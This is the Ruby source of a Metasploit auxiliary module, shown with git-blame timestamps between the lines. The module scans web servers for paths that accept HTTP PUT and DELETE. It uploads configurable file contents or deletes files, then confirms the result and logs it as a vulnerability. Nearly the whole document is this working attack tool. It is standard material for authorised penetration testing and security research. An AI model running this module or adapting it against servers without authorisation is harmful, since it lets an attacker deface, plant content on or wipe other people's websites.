2011-09-19 01:18:23 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-09-19 01:18:23 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2011-09-19 01:18:23 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::WmapScanDir
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'HTTP Writable Path PUT/DELETE File Access',
|
|
|
|
'Description' => %q{
|
|
|
|
This module can abuse misconfigured web servers to upload and delete web content
|
|
|
|
via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE.
|
|
|
|
|
|
|
|
PUT is the default. If filename isn't specified, the module will generate a
|
|
|
|
random string for you as a .txt file. If DELETE is used, a filename is required.
|
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Kashif [at] compulife.com.pk',
|
|
|
|
'CG',
|
|
|
|
'sinn3r',
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
2016-07-15 17:00:31 +00:00
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'OSVDB', '397'],
|
|
|
|
],
|
2013-08-30 21:28:54 +00:00
|
|
|
'Actions' =>
|
|
|
|
[
|
|
|
|
['PUT'],
|
|
|
|
['DELETE']
|
|
|
|
],
|
|
|
|
'DefaultAction' => 'PUT'
|
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('PATH', [true, "The path to attempt to write or delete", "/"]),
|
|
|
|
OptString.new('FILENAME', [true, "The file to attempt to write or delete", "msf_http_put_test.txt"]),
|
|
|
|
OptString.new('FILEDATA', [false, "The data to upload into the file", "msf test file"]),
|
|
|
|
OptString.new('ACTION', [true, "PUT or DELETE", "PUT"])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Send a normal HTTP request and see if we successfully uploaded or deleted a file.
|
|
|
|
# If successful, return true, otherwise false.
|
|
|
|
#
|
|
|
|
def file_exists(path, data)
|
|
|
|
begin
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => path,
|
|
|
|
'method' => 'GET',
|
|
|
|
'ctype' => 'text/plain',
|
|
|
|
'data' => data,
|
|
|
|
}, 20
|
|
|
|
).to_s
|
|
|
|
rescue ::Exception => e
|
2016-10-11 19:42:06 +00:00
|
|
|
print_error("#{ip}: Error: #{e.to_s}")
|
2013-08-30 21:28:54 +00:00
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
|
|
|
return (res =~ /#{data}/) ? true : false
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Do a PUT request to the server. Function returns the HTTP response.
|
|
|
|
#
|
|
|
|
def do_put(path, data)
|
|
|
|
begin
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => normalize_uri(path),
|
|
|
|
'method' => 'PUT',
|
|
|
|
'ctype' => 'text/plain',
|
|
|
|
'data' => data,
|
|
|
|
}, 20
|
|
|
|
)
|
|
|
|
rescue ::Exception => e
|
2016-10-11 19:42:06 +00:00
|
|
|
print_error("#{ip}: Error: #{e.to_s}")
|
2013-08-30 21:28:54 +00:00
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
|
|
|
return res
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Do a DELETE request. Function returns the HTTP response.
|
|
|
|
#
|
|
|
|
def do_delete(path)
|
|
|
|
begin
|
|
|
|
res = send_request_cgi(
|
|
|
|
{
|
|
|
|
'uri' => normalize_uri(path),
|
|
|
|
'method' => 'DELETE',
|
|
|
|
'ctype' => 'text/html',
|
|
|
|
}, 20
|
|
|
|
)
|
|
|
|
rescue ::Exception => e
|
2016-10-11 19:42:06 +00:00
|
|
|
print_error("#{ip}: Error: #{e.to_s}")
|
2013-08-30 21:28:54 +00:00
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
|
|
|
return res
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Main function for the module, duh!
|
|
|
|
#
|
|
|
|
def run_host(ip)
|
|
|
|
path = datastore['PATH']
|
|
|
|
data = datastore['FILEDATA']
|
|
|
|
|
|
|
|
if path[-1,1] != '/'
|
|
|
|
path += '/'
|
|
|
|
end
|
|
|
|
|
|
|
|
path += datastore['FILENAME']
|
|
|
|
|
|
|
|
case action.name
|
|
|
|
when 'PUT'
|
2015-04-03 11:12:23 +00:00
|
|
|
# Append filename if there isn't one
|
2013-08-30 21:28:54 +00:00
|
|
|
if path !~ /(.+\.\w+)$/
|
|
|
|
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
|
2016-10-11 19:42:06 +00:00
|
|
|
vprint_status("#{ip}: No filename specified. Using: #{path}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
2015-04-03 11:12:23 +00:00
|
|
|
# Upload file
|
2013-08-30 21:28:54 +00:00
|
|
|
res = do_put(path, data)
|
|
|
|
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
|
|
|
|
|
2015-04-03 11:12:23 +00:00
|
|
|
# Check file
|
2013-08-30 21:28:54 +00:00
|
|
|
if not res.nil? and file_exists(path, data)
|
|
|
|
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
|
|
|
|
print_good("File uploaded: #{turl}")
|
|
|
|
report_vuln(
|
|
|
|
:host => ip,
|
|
|
|
:port => rport,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:name => self.name,
|
|
|
|
:info => "Module #{self.fullname} confirmed write access to #{turl} via PUT",
|
|
|
|
:refs => self.references,
|
|
|
|
:exploited_at => Time.now.utc
|
|
|
|
)
|
|
|
|
else
|
2016-10-11 19:42:06 +00:00
|
|
|
print_error("#{ip}: File doesn't seem to exist. The upload probably failed.")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
when 'DELETE'
|
2015-04-03 11:12:23 +00:00
|
|
|
# Check file before deleting
|
2013-08-30 21:28:54 +00:00
|
|
|
if path !~ /(.+\.\w+)$/
|
|
|
|
print_error("You must supply a filename")
|
|
|
|
return
|
|
|
|
elsif not file_exists(path, data)
|
|
|
|
print_error("File is already gone. Will not continue DELETE")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2015-04-03 11:12:23 +00:00
|
|
|
# Delete our file
|
2013-08-30 21:28:54 +00:00
|
|
|
res = do_delete(path)
|
2016-10-11 19:42:06 +00:00
|
|
|
vprint_status("#{ip}: Reply: #{res.code.to_s}") if not res.nil?
|
2013-08-30 21:28:54 +00:00
|
|
|
|
2015-04-03 11:12:23 +00:00
|
|
|
# Check if DELETE was successful
|
2013-08-30 21:28:54 +00:00
|
|
|
if res.nil? or file_exists(path, data)
|
2016-10-11 19:42:06 +00:00
|
|
|
print_error("#{ip}: DELETE failed. File is still there.")
|
2013-08-30 21:28:54 +00:00
|
|
|
else
|
|
|
|
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
|
|
|
|
print_good("File deleted: #{turl}")
|
|
|
|
report_vuln(
|
|
|
|
:host => ip,
|
|
|
|
:port => rport,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:sname => (ssl ? 'https' : 'http'),
|
|
|
|
:name => self.name,
|
|
|
|
:info => "Module #{self.fullname} confirmed write access to #{turl} via DELETE",
|
|
|
|
:refs => self.references,
|
|
|
|
:exploited_at => Time.now.utc
|
|
|
|
)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2011-09-19 20:36:09 +00:00
|
|
|
|
2011-09-19 01:18:23 +00:00
|
|
|
end
|